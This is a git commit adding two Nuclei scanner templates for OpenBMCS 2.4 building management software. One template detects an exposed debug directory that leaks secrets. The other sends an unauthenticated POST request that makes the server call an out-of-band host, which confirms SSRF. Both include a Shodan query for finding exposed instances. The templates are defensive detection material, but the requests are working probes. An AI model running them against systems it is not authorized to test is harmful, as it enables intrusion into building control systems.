OpenBMCS Info Disclosure & SSRF Unauth (#3603)

* Create gophish-login.yaml * Create gophish-workflow.yaml * Update gophish-workflow.yaml * Create openbmcs-secret-disclosure.yaml * Create openbmcs-ssrf.yaml * Added additional matcher * Added missing header + matcher update Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io> Co-authored-by: root <root@3gzk.l.time4vps.cloud>
2022-01-26 16:56:40 +05:30 · 2022-01-26 16:56:40 +05:30 · 7bd14d5cbc
parent 173f0ef2d3
commit 7bd14d5cbc
2 changed files with 59 additions and 0 deletions
--- a/misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml
+++ b/misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml
@ -0,0 +1,28 @@
+id: openbmcs-secret-disclosure
+
+info:
+  name: OpenBMCS 2.4 Secrets Disclosure
+  author: dhiyaneshDK
+  severity: high
+  description: The application allows directory listing and information disclosure of some sensitive files that can allow an attacker to leverage the disclosed information and gain full BMS access
+  reference: https://www.exploit-db.com/exploits/50671
+  tags: openbmcs,misconfig
+  metadata:
+    shodan-query: http.favicon.hash:1550906681
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/debug/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "change_password_sqls"
+          - "Index of /debug"
+        condition: and
+
+      - type: status
+        status:
+          - 200
--- a/misconfiguration/openbmcs/openbmcs-ssrf.yaml
+++ b/misconfiguration/openbmcs/openbmcs-ssrf.yaml
@ -0,0 +1,31 @@
+id: openbmcs-ssrf
+
+info:
+  name: OpenBMCS 2.4 Unauthenticated SSRF / RFI
+  author: dhiyaneshDK
+  severity: high
+  description: Unauthenticated Server-Side Request Forgery (SSRF) and Remote File Include (RFI) vulnerability exists in OpenBMCS within its functionalities. The application parses user supplied data in the POST parameter 'ip' to query a server IP on port 81 by default. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application, allows hijacking the current session of the user, execute cross-site scripting code or changing the look of the page and content modification on current display
+  reference: https://www.exploit-db.com/exploits/50670
+  tags: ssrf,oast,openbmcs
+  metadata:
+    shodan-query: http.favicon.hash:1550906681
+
+requests:
+  - raw:
+      - |
+        POST /php/query.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        ip={{interactsh-url}}:80&argu=/
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the DNS Interaction
+        words:
+          - "http"
+
+      - type: status
+        status:
+          - 302